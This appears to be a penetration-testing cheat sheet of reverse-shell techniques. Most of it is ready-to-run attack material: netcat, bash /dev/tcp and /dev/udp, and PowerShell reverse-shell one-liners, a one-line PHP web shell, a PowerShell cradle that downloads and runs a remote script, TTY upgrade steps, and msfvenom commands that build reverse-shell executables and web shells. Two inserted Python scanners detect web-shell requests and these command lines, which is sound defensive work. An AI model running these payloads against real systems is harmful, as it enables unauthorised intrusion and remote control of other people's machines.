Build Space
Basic reverse shell
Using netcat to get a reverse shell (note: netcat is rarely present on enterprise/production systems):
nc -e /bin/sh 10.10.10.200 8888
or /bin/sh | nc 10.10.10.200 8888
Listening for the connection on the attacking machine: nc -lvnp 8888
Switches:
-l | listen mode, for inbound connections
-v | verbose
-n | numeric-only IP addresses, no DNS
-p | local port number
Simple PHP web shell
If we can upload a file onto a target web server, or edit an existing file, this is a very simple shell:
<?php echo shell_exec($_GET['cmd']); ?>
Visit the uploaded file to use it for system commands:
http://<target>/webshell.php?cmd=<commands>
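On the defending side, a web shell like the one above is visible in the web server's access log: a server-side script sitting in a directory that should only hold static uploads, and a query parameter carrying a command. The following is an added example (not part of the original page): a small Python scanner over constructed Apache/nginx combined-format log lines. The upload directories, script extensions and parameter names are assumptions chosen for this example and should be adjusted to the application being monitored.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format; the addresses,
# paths and user agents are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/webshell.php?cmd=id HTTP/1.1" 200 512 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /uploads/webshell.php?cmd=uname%20-a HTTP/1.1" 200 640 "-" "curl/7.88.1"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 8012 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "GET /uploads/avatar.png HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "POST /images/shell.jsp HTTP/1.1" 200 140 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumptions for this example: directories that should only ever hold static
# uploads, server-side script extensions, and parameter names typically used
# to pass a command to a web shell.
UPLOAD_DIRS = ("/uploads/", "/images/", "/files/")
SCRIPT_EXTS = (".php", ".phtml", ".asp", ".aspx", ".jsp")
CMD_PARAMS = {"cmd", "command", "exec", "execute", "run"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def analyse(rec):
    """Return the list of reasons a parsed request looks like web shell use."""
    reasons = []
    path = rec["path"].lower()
    if path.endswith(SCRIPT_EXTS) and path.startswith(UPLOAD_DIRS):
        reasons.append("script_in_upload_dir")
    for name in rec["params"]:
        if name.lower() in CMD_PARAMS:
            reasons.append(f"command_parameter:{name}")
    return reasons


def scan_log(text):
    """Scan a whole log and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = analyse(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "method": rec["method"],
                             "path": rec["path"], "status": rec["status"],
                             "reasons": reasons})
    return findings


def summarize(findings):
    """Count findings per (source IP, path) so repeated use of one script stands out."""
    return Counter((f["ip"], f["path"]) for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:<14} {f['method']:<5} {f['path']:<28} {', '.join(f['reasons'])}")
    for (ip, path), n in summarize(hits).items():
        print(f"{n} request(s) from {ip} to {path}")
```

The two checks are deliberately independent: a script under an upload directory is worth a look even when it is called without parameters (the POST to shell.jsp in the sample), and a cmd-style parameter is worth a look wherever it appears. The per-(IP, path) count surfaces the repeated use that distinguishes an operator driving a shell from a one-off scanner hit.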
Upgrading shells
Using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Using stty to get a fully interactive TTY:
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash");'
Ctrl-Z
# In terminal
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
Bash TCP
$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
$ 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
# Victim
$ sh -i >& /dev/udp/10.10.10.1/8888 0>&1
# Listener
$ nc -u -lvp 8888
Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
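Every construct on this page so far (the netcat and shell-pipe forms, the /dev/tcp and /dev/udp redirections, the pty.spawn upgrade, and the PowerShell TCPClient and download-cradle one-liners) leaves a recognisable process command line. The following is an added example, not part of the original cheat sheet: a Python scanner that runs one detection rule per construct over constructed process-creation events and, where the command line carries a callback address, pulls it out for the alert. The event fields host, pid, user and cmdline are an assumed simplified shape, not any vendor's schema, and the sample events are made up.

```python
import re

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"

# Constructed sample events (not from any real system); "cmdline" is what an
# EDR process-creation record or an auditd EXECVE record would carry.
SAMPLE_EVENTS = [
    {"host": "web01", "pid": 4101, "user": "www-data",
     "cmdline": "nc -e /bin/sh 10.10.10.200 8888"},
    {"host": "web01", "pid": 4102, "user": "www-data",
     "cmdline": "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"},
    {"host": "web01", "pid": 4103, "user": "www-data",
     "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"host": "app02", "pid": 4104, "user": "app",
     "cmdline": "sh -i >& /dev/udp/10.10.10.1/8888 0>&1"},
    {"host": "ws07", "pid": 5120, "user": "CORP\\jdoe",
     "cmdline": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);"
                "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\""},
    {"host": "ws07", "pid": 5121, "user": "CORP\\jdoe",
     "cmdline": "powershell IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')"},
    # Benign: a monitoring port check and an interpreter version probe.
    {"host": "mon01", "pid": 900, "user": "nagios", "cmdline": "nc -zv 10.0.0.5 443"},
    {"host": "web01", "pid": 4200, "user": "root",
     "cmdline": "python -c 'import sys; print(sys.version)'"},
]

# Rules: (name, severity, pattern). Each pattern targets one construct from the
# cheat sheet; patterns are searched over the full command line.
RULES = [
    ("netcat_exec_shell", "high",
     re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-\w*e\s+\S*sh\b")),
    ("shell_piped_to_netcat", "high",
     re.compile(r"\b(?:ba)?sh\b[^|]*\|\s*(?:nc|ncat|netcat)\b")),
    ("bash_dev_tcp_udp", "high",
     re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/\d{1,5}")),
    ("python_pty_spawn", "medium",
     re.compile(r"import\s+pty\b.*pty\.spawn\(")),
    ("powershell_tcpclient_iex", "high",
     re.compile(r"(?i)Net\.Sockets\.TCPClient\b.*\b(?:iex|Invoke-Expression)\b")),
    ("powershell_download_cradle", "medium",
     re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b.*\bDownloadString\(")),
]

# Where to pull the callback address from, in order of preference.
ENDPOINT_PATTERNS = [
    re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/(\d{1,5})"),
    re.compile(r"(?i)TCPClient\(\s*['\"]" + IPV4 + r"['\"]\s*,\s*(\d{1,5})"),
    re.compile(r"\b(?:nc|ncat|netcat)\b.*?\s" + IPV4 + r"\s+(\d{1,5})\b"),
]


def scan_cmdline(cmdline):
    """Return [(rule_name, severity), ...] for every rule that fires."""
    return [(name, sev) for name, sev, pat in RULES if pat.search(cmdline)]


def extract_endpoint(cmdline):
    """Best-effort (ip, port) of the callback address, or None if none is visible."""
    for pat in ENDPOINT_PATTERNS:
        m = pat.search(cmdline)
        if m:
            return m.group(1), int(m.group(2))
    return None


def scan_events(events):
    """Turn process-creation events into alerts; events with no hit are dropped."""
    alerts = []
    for ev in events:
        hits = scan_cmdline(ev["cmdline"])
        if not hits:
            continue
        alerts.append({
            "host": ev["host"], "pid": ev["pid"], "user": ev["user"],
            "rules": [name for name, _ in hits],
            "severity": "high" if any(s == "high" for _, s in hits) else "medium",
            "remote": extract_endpoint(ev["cmdline"]),
        })
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"[{a['severity']:<6}] {a['host']} pid={a['pid']} user={a['user']} "
              f"rules={','.join(a['rules'])} remote={a['remote']}")
```

The pty.spawn and download-cradle rules are rated medium on purpose: both also occur in legitimate administration, so on their own they are a lead rather than an incident, whereas a shell bound to /dev/tcp or netcat -e has no routine use on a production host. The extracted remote address is what lets the alert be pivoted straight into network telemetry to confirm the connection actually left the host.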
Msfvenom Payloads (non-meterpreter)
Windows Staged reverse TCP
x86 | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe
x64 | msfvenom -p windows/x64/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x64.exe
Windows Stageless reverse TCP
x86 | msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe
x64 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x64.exe
Staged Payloads for Linux
x86 | msfvenom -p linux/x86/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf
x64 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf
Stageless Payloads for Linux
x86 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf
x64 | msfvenom -p linux/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf
Web Shells
asp | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f asp > shell.asp
jsp | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f raw > shell.jsp
war | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f war > shell.war (if we have access to a Tomcat server's management interface, we can upload a WAR file)
php | msfvenom -p php/reverse_php LHOST=<lhost> LPORT=<lport> -f raw > shell.php